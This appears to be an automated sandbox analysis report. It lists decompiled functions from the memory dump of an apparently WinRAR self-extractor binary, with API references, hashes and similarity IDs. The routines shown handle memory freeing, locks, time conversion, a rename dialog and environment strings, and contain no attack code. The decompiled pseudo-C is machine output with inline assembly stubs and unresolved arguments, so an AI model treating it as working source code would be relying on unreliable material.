          • GetWindowRect.USER32(?,00000000), ref: 00209044
          • ShowWindow.USER32(?,00000005,00000000), ref: 002090DB
          • SetWindowTextW.USER32(?,00000000), ref: 002090E3
          • ShowWindow.USER32(00000000,00000005), ref: 002090F9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: Window$Show$RectText
          • String ID: RarHtmlClassName
          • API String ID: 3937224194-1658105358
          • Opcode ID: d9c49eaea692ff4691360701e74f03caecb2c3bde4254eb6245fba265911abcc
          • Instruction ID: dc1d7f63de9a0f58b2897fc607c696a2c29ff43c87dc5c9a771d1eaa2f6b80b1
          • Opcode Fuzzy Hash: d9c49eaea692ff4691360701e74f03caecb2c3bde4254eb6245fba265911abcc
          • Instruction Fuzzy Hash: 2C31BF31108301AFCB219FA4AD4CB9BBBA8EB48701F004559F94BAA097CB31D8A1CF65
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0021B506(intOrPtr _a4) {
          				void* _t18;
          
          				_t45 = _a4;
          				if(_a4 != 0) {
          					E0021B4CA(_t45, 7);
          					E0021B4CA(_t45 + 0x1c, 7);
          					E0021B4CA(_t45 + 0x38, 0xc);
          					E0021B4CA(_t45 + 0x68, 0xc);
          					E0021B4CA(_t45 + 0x98, 2);
          					E00217A50( *((intOrPtr*)(_t45 + 0xa0)));
          					E00217A50( *((intOrPtr*)(_t45 + 0xa4)));
          					E00217A50( *((intOrPtr*)(_t45 + 0xa8)));
          					E0021B4CA(_t45 + 0xb4, 7);
          					E0021B4CA(_t45 + 0xd0, 7);
          					E0021B4CA(_t45 + 0xec, 0xc);
          					E0021B4CA(_t45 + 0x11c, 0xc);
          					E0021B4CA(_t45 + 0x14c, 2);
          					E00217A50( *((intOrPtr*)(_t45 + 0x154)));
          					E00217A50( *((intOrPtr*)(_t45 + 0x158)));
          					E00217A50( *((intOrPtr*)(_t45 + 0x15c)));
          					return E00217A50( *((intOrPtr*)(_t45 + 0x160)));
          				}
          				return _t18;
          			}





          APIs
            • Part of subcall function 0021B4CA: _free.LIBCMT ref: 0021B4F3
          • _free.LIBCMT ref: 0021B554
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021B55F
          • _free.LIBCMT ref: 0021B56A
          • _free.LIBCMT ref: 0021B5BE
          • _free.LIBCMT ref: 0021B5C9
          • _free.LIBCMT ref: 0021B5D4
          • _free.LIBCMT ref: 0021B5DF
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
          • Instruction ID: 2ffb0e1e8edcfac1aade232b330d772ef67f954e466fff87925aa510411ceaa6
          • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
          • Instruction Fuzzy Hash: DB114272560708A6D621B770CC07FCF77FC6F50B01F408815B79E66053D765B5A44E60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 95%
          			E00211694(void* __ecx, void* __edx) {
          				void* _t4;
          				void* _t11;
          				void* _t16;
          				long _t26;
          				void* _t29;
          
          				if( *0x22d680 != 0xffffffff) {
          					_t26 = GetLastError();
          					_t11 = E0021288E(__eflags,  *0x22d680);
          					__eflags = _t11 - 0xffffffff;
          					if(_t11 == 0xffffffff) {
          						L5:
          						_t11 = 0;
          					} else {
          						__eflags = _t11;
          						if(__eflags == 0) {
          							_t4 = E002128C8(__eflags,  *0x22d680, 0xffffffff);
          							_pop(_t16);
          							__eflags = _t4;
          							if(_t4 != 0) {
          								_t29 = E00217B1B(_t16, 1, 0x28);
          								__eflags = _t29;
          								if(__eflags == 0) {
          									L8:
          									_t11 = 0;
          									E002128C8(__eflags,  *0x22d680, 0);
          								} else {
          									__eflags = E002128C8(__eflags,  *0x22d680, _t29);
          									if(__eflags != 0) {
          										_t11 = _t29;
          										_t29 = 0;
          										__eflags = 0;
          									} else {
          										goto L8;
          									}
          								}
          								E00217A50(_t29);
          							} else {
          								goto L5;
          							}
          						}
          					}
          					SetLastError(_t26);
          					return _t11;
          				} else {
          					return 0;
          				}
          			}









          APIs
          • GetLastError.KERNEL32(?,?,0021168B,0020F0E2), ref: 002116A2
          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002116B0
          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002116C9
          • SetLastError.KERNEL32(00000000,?,0021168B,0020F0E2), ref: 0021171B
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorLastValue___vcrt_
          • String ID:
          • API String ID: 3852720340-0
          • Opcode ID: d9dca083bac4d4b0ea296ea7e13376013d29517b265c1b367119e67a870cb3f8
          • Instruction ID: 291e759997063b8466499fdbcf2ad971734c58506c4917ed550fc5b09d232530
          • Opcode Fuzzy Hash: d9dca083bac4d4b0ea296ea7e13376013d29517b265c1b367119e67a870cb3f8
          • Instruction Fuzzy Hash: CE012832279212BEA7342EB57C894E62BCCEB313713310339F214811E1EF624CBA5954
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 77%
          			E0020D27B() {
          				intOrPtr _t1;
          				_Unknown_base(*)()* _t3;
          				void* _t5;
          				_Unknown_base(*)()* _t6;
          				struct HINSTANCE__* _t14;
          
          				_t1 =  *0x24fe58;
          				if(_t1 != 1) {
          					if(_t1 == 0) {
          						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
          						if(_t14 != 0) {
          							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
          							if(_t3 == 0) {
          								goto L5;
          							} else {
          								 *0x24fe5c = _t3;
          								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
          								if(_t6 == 0) {
          									goto L5;
          								} else {
          									 *0x24fe60 = _t6;
          								}
          							}
          						} else {
          							L5:
          							_t14 = 1;
          						}
          						asm("lock cmpxchg [edx], ecx");
          						if(0 != 0 || _t14 != 1) {
          							if(0 != 1) {
          								_t5 = 1;
          							} else {
          								goto L12;
          							}
          						} else {
          							L12:
          							_t5 = 0;
          						}
          						return _t5;
          					} else {
          						return 1;
          					}
          				} else {
          					return 0;
          				}
          			}









          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
          • API String ID: 0-1718035505
          • Opcode ID: d2c76262dcdaa29313ef0f537c4f20d9c7fb6aa3cb12492b800e15fe97ba68d9
          • Instruction ID: b8b957139c9b7289eee56c889eaebd512f8370206e46eaab0d55a414c00ac8f8
          • Opcode Fuzzy Hash: d2c76262dcdaa29313ef0f537c4f20d9c7fb6aa3cb12492b800e15fe97ba68d9
          • Instruction Fuzzy Hash: 2301D175773363AF9F706EF86C9859623849A53B16310253AEC00D3293E751C876DAA0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 65%
          			E00200910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
          				char _v16;
          				struct _SYSTEMTIME _v32;
          				struct _SYSTEMTIME _v48;
          				struct _FILETIME _v64;
          				struct _FILETIME _v72;
          				intOrPtr _v76;
          				struct _FILETIME _v84;
          				intOrPtr _t47;
          				long _t61;
          				intOrPtr* _t66;
          				long _t72;
          				intOrPtr _t73;
          				intOrPtr* _t76;
          
          				_t73 = __edx;
          				_t66 = _a4;
          				_t76 = __ecx;
          				_v48.wYear =  *_t66;
          				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
          				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
          				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
          				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
          				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
          				_v48.wMilliseconds = 0;
          				_v48.wDayOfWeek.wYear = 0;
          				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
          					 *_t76 = 0;
          					 *((intOrPtr*)(_t76 + 4)) = 0;
          				} else {
          					if(E001FA995() >= 0x600) {
          						FileTimeToSystemTime( &_v64,  &_v32);
          						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
          						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
          						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
          						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
          						asm("sbb eax, [esp+0x24]");
          						asm("sbb eax, edi");
          						asm("adc eax, edi");
          						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
          						asm("adc eax, edi");
          					} else {
          						LocalFileTimeToFileTime( &_v64,  &_v72);
          						_t61 = _v72.dwHighDateTime.dwLowDateTime;
          						_t72 = _v72.dwLowDateTime;
          					}
          					 *_t76 = E0020DDC0(_t72, _t61, 0x64, 0);
          					 *((intOrPtr*)(_t76 + 4)) = _t73;
          				}
          				_t47 =  *((intOrPtr*)(_t66 + 0x18));
          				 *_t76 =  *_t76 + _t47;
          				asm("adc [esi+0x4], edi");
          				return _t47;
          			}

















          APIs
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0020096E
            • Part of subcall function 001FA995: GetVersionExW.KERNEL32(?), ref: 001FA9BA
          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00200990
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 002009AA
          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002009BB
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 002009CB
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 002009D7
          Similarity
          • API ID: Time$File$System$Local$SpecificVersion
          • String ID:
          • API String ID: 2092733347-0
          • Opcode ID: 2a3d50267e000f0117baec7a3b9505121b648ca0908bf9a0c8592da94f24caaf
          • Instruction ID: ddcc1355dd6141e11c10abd0cfbab3b82568c76718504f689f4281fc6936c1a9
          • Opcode Fuzzy Hash: 2a3d50267e000f0117baec7a3b9505121b648ca0908bf9a0c8592da94f24caaf
          • Instruction Fuzzy Hash: A5310776118346EAC700DFA5D8849ABB7E8FF98704F04591EFA99C3211EB30D509CB26
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 96%
          			E00208BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
          				void* _t16;
          				signed int _t22;
          				void* _t25;
          				signed int _t30;
          				signed int* _t34;
          
          				_t34 = _a12;
          				if(_t34 != 0) {
          					_t32 = _a8;
          					_t25 = 0x10;
          					if(E0020F3CA(_a8, 0x2240bc, _t25) == 0) {
          						L13:
          						_t30 = _a4;
          						 *_t34 = _t30;
          						L14:
          						 *((intOrPtr*)( *_t30 + 4))(_t30);
          						_t16 = 0;
          						L16:
          						return _t16;
          					}
          					if(E0020F3CA(_t32, 0x2240fc, _t25) != 0) {
          						if(E0020F3CA(_t32, 0x2240dc, _t25) != 0) {
          							if(E0020F3CA(_t32, 0x2240ac, _t25) != 0) {
          								if(E0020F3CA(_t32, 0x22414c, _t25) != 0) {
          									if(E0020F3CA(_t32, 0x22409c, _t25) != 0) {
          										 *_t34 =  *_t34 & 0x00000000;
          										_t16 = 0x80004002;
          										goto L16;
          									}
          									goto L13;
          								}
          								_t30 = _a4;
          								_t22 = _t30 + 0x10;
          								L11:
          								asm("sbb ecx, ecx");
          								 *_t34 =  ~_t30 & _t22;
          								goto L14;
          							}
          							_t30 = _a4;
          							_t22 = _t30 + 0xc;
          							goto L11;
          						}
          						_t30 = _a4;
          						_t22 = _t30 + 8;
          						goto L11;
          					}
          					_t30 = _a4;
          					_t22 = _t30 + 4;
          					goto L11;
          				}
          				return 0x80004003;
          			}









          APIs
          Similarity
          • API ID: _memcmp
          • String ID:
          • API String ID: 2931989736-0
          • Opcode ID: e854f057494ec57acfd7c26651d48619a73aedea68e8207df17eac0bb107ee79
          • Instruction ID: dd2dd453cb94fa15d971b442a2f49cb8e4db2b83a84365d3dd238a355432bb37
          • Opcode Fuzzy Hash: e854f057494ec57acfd7c26651d48619a73aedea68e8207df17eac0bb107ee79
          • Instruction Fuzzy Hash: 6621C77167030AABEB1C6F10DD81F3B73BC9B50758F04412AFC8496183EA74EDA587A0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 72%
          			E00218516(void* __ebx, void* __ecx, void* __edx) {
          				void* __edi;
          				void* __esi;
          				intOrPtr _t2;
          				void* _t3;
          				void* _t4;
          				intOrPtr _t9;
          				void* _t11;
          				void* _t20;
          				void* _t21;
          				void* _t23;
          				void* _t25;
          				void* _t27;
          				void* _t29;
          				void* _t31;
          				void* _t32;
          				long _t36;
          				long _t37;
          				void* _t40;
          
          				_t29 = __edx;
          				_t23 = __ecx;
          				_t20 = __ebx;
          				_t36 = GetLastError();
          				_t2 =  *0x22d6ac; // 0x6
          				_t42 = _t2 - 0xffffffff;
          				if(_t2 == 0xffffffff) {
          					L2:
          					_t3 = E00217B1B(_t23, 1, 0x364);
          					_t31 = _t3;
          					_pop(_t25);
          					if(_t31 != 0) {
          						_t4 = E00219BA9(_t25, _t36, __eflags,  *0x22d6ac, _t31);
          						__eflags = _t4;
          						if(_t4 != 0) {
          							E00218388(_t25, _t31, 0x250418);
          							E00217A50(0);
          							_t40 = _t40 + 0xc;
          							__eflags = _t31;
          							if(_t31 == 0) {
          								goto L9;
          							} else {
          								goto L8;
          							}
          						} else {
          							_push(_t31);
          							goto L4;
          						}
          					} else {
          						_push(_t3);
          						L4:
          						E00217A50();
          						_pop(_t25);
          						L9:
          						SetLastError(_t36);
          						E00217AD8(_t20, _t29, _t31, _t36);
          						asm("int3");
          						_push(_t20);
          						_push(_t36);
          						_push(_t31);
          						_t37 = GetLastError();
          						_t21 = 0;
          						_t9 =  *0x22d6ac; // 0x6
          						_t45 = _t9 - 0xffffffff;
          						if(_t9 == 0xffffffff) {
          							L12:
          							_t32 = E00217B1B(_t25, 1, 0x364);
          							_pop(_t27);
          							if(_t32 != 0) {
          								_t11 = E00219BA9(_t27, _t37, __eflags,  *0x22d6ac, _t32);
          								__eflags = _t11;
          								if(_t11 != 0) {
          									E00218388(_t27, _t32, 0x250418);
          									E00217A50(_t21);
          									__eflags = _t32;
          									if(_t32 != 0) {
          										goto L19;
          									} else {
          										goto L18;
          									}
          								} else {
          									_push(_t32);
          									goto L14;
          								}
          							} else {
          								_push(_t21);
          								L14:
          								E00217A50();
          								L18:
          								SetLastError(_t37);
          							}
          						} else {
          							_t32 = E00219B53(_t25, _t37, _t45, _t9);
          							if(_t32 != 0) {
          								L19:
          								SetLastError(_t37);
          								_t21 = _t32;
          							} else {
          								goto L12;
          							}
          						}
          						return _t21;
          					}
          				} else {
          					_t31 = E00219B53(_t23, _t36, _t42, _t2);
          					if(_t31 != 0) {
          						L8:
          						SetLastError(_t36);
          						return _t31;
          					} else {
          						goto L2;
          					}
          				}
          			}






















          APIs
          • GetLastError.KERNEL32(?,002300E0,00213394,002300E0,?,?,00212E0F,?,?,002300E0), ref: 0021851A
          • _free.LIBCMT ref: 0021854D
          • _free.LIBCMT ref: 00218575
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 00218582
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 0021858E
          • _abort.LIBCMT ref: 00218594
          Similarity
          • API ID: ErrorLast$_free$_abort
          • String ID:
          • API String ID: 3160817290-0
          • Opcode ID: c12212c2d5d9df739ddd21e27cc1857c26f0d8e6b089e8555e36241fe1ae61c2
          • Instruction ID: 1aa85b2ab55114a2ff099f3678887a523b480f84618729c82b4468a567bb0eaf
          • Opcode Fuzzy Hash: c12212c2d5d9df739ddd21e27cc1857c26f0d8e6b089e8555e36241fe1ae61c2
          • Instruction Fuzzy Hash: E2F0A4351A860176D32177757C8AEEB22EBCFF2761F660224F518A2191EE618BE28560
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 83%
          			E0020C2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
          				void* _t12;
          				WCHAR* _t16;
          				void* _t17;
          				struct HWND__* _t18;
          				intOrPtr _t19;
          				void* _t20;
          				signed short _t23;
          
          				_t16 = _a16;
          				_t23 = _a12;
          				_t19 = _a8;
          				_t18 = _a4;
          				if(E001F12D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
          					L10:
          					return 1;
          				}
          				_t20 = _t19 - 0x110;
          				if(_t20 == 0) {
          					 *0x24de34 = _t16;
          					SetDlgItemTextW(_t18, 0x66, _t16);
          					SetDlgItemTextW(_t18, 0x68,  *0x24de34);
          					goto L10;
          				}
          				if(_t20 != 1) {
          					L5:
          					return 0;
          				}
          				_t12 = (_t23 & 0x0000ffff) - 1;
          				if(_t12 == 0) {
          					GetDlgItemTextW(_t18, 0x68,  *0x24de34, 0x800);
          					_push(1);
          					L7:
          					EndDialog(_t18, ??);
          					goto L10;
          				}
          				if(_t12 == 1) {
          					_push(0);
          					goto L7;
          				}
          				goto L5;
          			}











          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 0020C2F2
          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0020C308
          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0020C322
          • SetDlgItemTextW.USER32(?,00000068), ref: 0020C32D
          Strings
          Similarity
          • API ID: ItemText$DialogWindow
          • String ID: RENAMEDLG
          • API String ID: 445417207-3299779563
          • Opcode ID: 11c2f4d1f09cdf4b1d07aa426f0d2be92d6403e54925941614a9ea34890f321b
          • Instruction ID: 4e2e9435ff3a4cde72ba600480741ed8beab696c7c9ef792248269d56916d338
          • Opcode Fuzzy Hash: 11c2f4d1f09cdf4b1d07aa426f0d2be92d6403e54925941614a9ea34890f321b
          • Instruction Fuzzy Hash: 0F01F5726603257BD3205FE46E48F377B6CE75AB00F204115F601B64D1C2D26C219765
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 37%
          			E00216B78(void* __ecx, void* __esi, intOrPtr _a4) {
          				signed int _v8;
          				signed int _v12;
          				signed int _t10;
          				intOrPtr* _t20;
          				signed int _t22;
          
          				_t10 =  *0x22d668; // 0x4319796a
          				_v8 = _t10 ^ _t22;
          				_v12 = _v12 & 0x00000000;
          				_t12 =  &_v12;
          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
          				if(_t12 != 0) {
          					_t20 = GetProcAddress(_v12, "CorExitProcess");
          					if(_t20 != 0) {
          						 *0x222260(_a4);
          						_t12 =  *_t20();
          					}
          				}
          				if(_v12 != 0) {
          					_t12 = FreeLibrary(_v12);
          				}
          				return E0020E203(_t12, _v8 ^ _t22);
          			}









          APIs
          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00216B29,?,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002), ref: 00216B98
          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00216BAB
          • FreeLibrary.KERNEL32(00000000,?,?,?,00216B29,?,?,00216AC9,?,0022A800,0000000C,00216C20,?,00000002,00000000), ref: 00216BCE
          Strings
          Similarity
          • API ID: AddressFreeHandleLibraryModuleProc
          • String ID: CorExitProcess$mscoree.dll
          • API String ID: 4061214504-1276376045
          • Opcode ID: 9b68b5f997bf52ceb7233aa0ece63e7202a7e508878509b531a619df8ea7543f
          • Instruction ID: 91d7cc8abb43fe89702fc825e5b3d94f8cbe8adf62d75c6b91c2ad677440b555
          • Opcode Fuzzy Hash: 9b68b5f997bf52ceb7233aa0ece63e7202a7e508878509b531a619df8ea7543f
          • Instruction Fuzzy Hash: 59F03131A1521DFBCB259FD4EC0DFEEBBB9EB04715F400055E809A2190DB754B95CA90
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E001FE7E3(struct HINSTANCE__** __ecx) {
          				void* _t5;
          				struct HINSTANCE__* _t6;
          				struct HINSTANCE__** _t9;
          
          				_t9 = __ecx;
          				if(__ecx[1] == 0) {
          					_t6 = E001FFCFD(L"Crypt32.dll");
          					 *__ecx = _t6;
          					if(_t6 != 0) {
          						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
          						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
          						_t9[3] = _t6;
          					}
          					_t9[1] = 1;
          					return _t6;
          				}
          				return _t5;
          			}







          APIs
            • Part of subcall function 001FFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
            • Part of subcall function 001FFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001FE802
          • GetProcAddress.KERNEL32(00237350,CryptUnprotectMemory), ref: 001FE812
          Strings
          Similarity
          • API ID: AddressProc$DirectoryLibraryLoadSystem
          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
          • API String ID: 2141747552-1753850145
          • Opcode ID: bd8b3607bc60323b845a661ab0ef09b3e8e3987f235f4f87d7319ad0c5520728
          • Instruction ID: ee6ee16b3d85d97b0aa0ace79000806853494fabe55b16c38a252317c35021fa
          • Opcode Fuzzy Hash: bd8b3607bc60323b845a661ab0ef09b3e8e3987f235f4f87d7319ad0c5520728
          • Instruction Fuzzy Hash: D8E04FB1511657FACB106BB4A80CA21FBA86F25700B10D125A514D3561DBB5D069CB60
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 83%
          			E00217389(signed int* __ecx, signed int __edx) {
          				signed int _v8;
          				intOrPtr* _v12;
          				signed int _v16;
          				signed int _t28;
          				signed int _t29;
          				intOrPtr _t33;
          				signed int _t37;
          				signed int _t38;
          				signed int _t40;
          				void* _t50;
          				signed int _t56;
          				intOrPtr* _t57;
          				signed int _t68;
          				signed int _t71;
          				signed int _t72;
          				signed int _t74;
          				signed int _t75;
          				signed int _t78;
          				signed int _t80;
          				signed int* _t81;
          				signed int _t85;
          				void* _t86;
          
          				_t72 = __edx;
          				_v12 = __ecx;
          				_t28 =  *__ecx;
          				_t81 =  *_t28;
          				if(_t81 != 0) {
          					_t29 =  *0x22d668; // 0x4319796a
          					_t56 =  *_t81 ^ _t29;
          					_t78 = _t81[1] ^ _t29;
          					_t83 = _t81[2] ^ _t29;
          					asm("ror edi, cl");
          					asm("ror esi, cl");
          					asm("ror ebx, cl");
          					if(_t78 != _t83) {
          						L14:
          						 *_t78 = E002169A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
          						_t33 = E0020DB10(_t56);
          						_t57 = _v12;
          						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
          						_t24 = _t78 + 4; // 0x4
          						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0020DB10(_t24);
          						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0020DB10(_t83);
          						_t37 = 0;
          						L15:
          						return _t37;
          					}
          					_t38 = 0x200;
          					_t85 = _t83 - _t56 >> 2;
          					if(_t85 <= 0x200) {
          						_t38 = _t85;
          					}
          					_t80 = _t38 + _t85;
          					if(_t80 == 0) {
          						_t80 = 0x20;
          					}
          					if(_t80 < _t85) {
          						L9:
          						_push(4);
          						_t80 = _t85 + 4;
          						_push(_t80);
          						_v8 = E0021AC29(_t56);
          						_t40 = E00217A50(0);
          						_t68 = _v8;
          						_t86 = _t86 + 0x10;
          						if(_t68 != 0) {
          							goto L11;
          						}
          						_t37 = _t40 | 0xffffffff;
          						goto L15;
          					} else {
          						_push(4);
          						_push(_t80);
          						_v8 = E0021AC29(_t56);
          						E00217A50(0);
          						_t68 = _v8;
          						_t86 = _t86 + 0x10;
          						if(_t68 != 0) {
          							L11:
          							_t56 = _t68;
          							_v8 = _t68 + _t85 * 4;
          							_t83 = _t68 + _t80 * 4;
          							_t78 = _v8;
          							_push(0x20);
          							asm("ror eax, cl");
          							_t71 = _t78;
          							_v16 = 0 ^  *0x22d668;
          							asm("sbb edx, edx");
          							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
          							_v8 = _t74;
          							if(_t74 == 0) {
          								goto L14;
          							}
          							_t75 = _v16;
          							_t50 = 0;
          							do {
          								_t50 = _t50 + 1;
          								 *_t71 = _t75;
          								_t71 = _t71 + 4;
          							} while (_t50 != _v8);
          							goto L14;
          						}
          						goto L9;
          					}
          				}
          				return _t28 | 0xffffffff;
          			}


























          APIs
          Similarity
          • API ID: _free
          • String ID:
          • API String ID: 269201875-0
          • Opcode ID: 206427411ce61761d8df9133d102baeedf9989bbfa6f6e84ad131d956acc1f0a
          • Instruction ID: d63356651f569ee7022e3079b01d9c02960a926bee63514e6b74ef3a1cb6106d
          • Opcode Fuzzy Hash: 206427411ce61761d8df9133d102baeedf9989bbfa6f6e84ad131d956acc1f0a
          • Instruction Fuzzy Hash: F5410436A103049FCB20DFB8C881A9EB7F5EF98714F1545A9E515EB381D731AD51CB80
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 93%
          			E0021ABA6() {
          				int _v8;
          				void* __ecx;
          				void* _t6;
          				int _t7;
          				char* _t13;
          				int _t17;
          				void* _t19;
          				char* _t25;
          				WCHAR* _t27;
          
          				_t27 = GetEnvironmentStringsW();
          				if(_t27 == 0) {
          					L7:
          					_t13 = 0;
          				} else {
          					_t6 = E0021AB6F(_t27);
          					_pop(_t19);
          					_t17 = _t6 - _t27 >> 1;
          					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
          					_v8 = _t7;
          					if(_t7 == 0) {
          						goto L7;
          					} else {
          						_t25 = E00217A8A(_t19, _t7);
          						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
          							_t13 = 0;
          						} else {
          							_t13 = _t25;
          							_t25 = 0;
          						}
          						E00217A50(_t25);
          					}
          				}
          				if(_t27 != 0) {
          					FreeEnvironmentStringsW(_t27);
          				}
          				return _t13;
          			}













          APIs
          • GetEnvironmentStringsW.KERNEL32 ref: 0021ABAF
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021ABD2
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0021ABF8
          • _free.LIBCMT ref: 0021AC0B
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0021AC1A
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
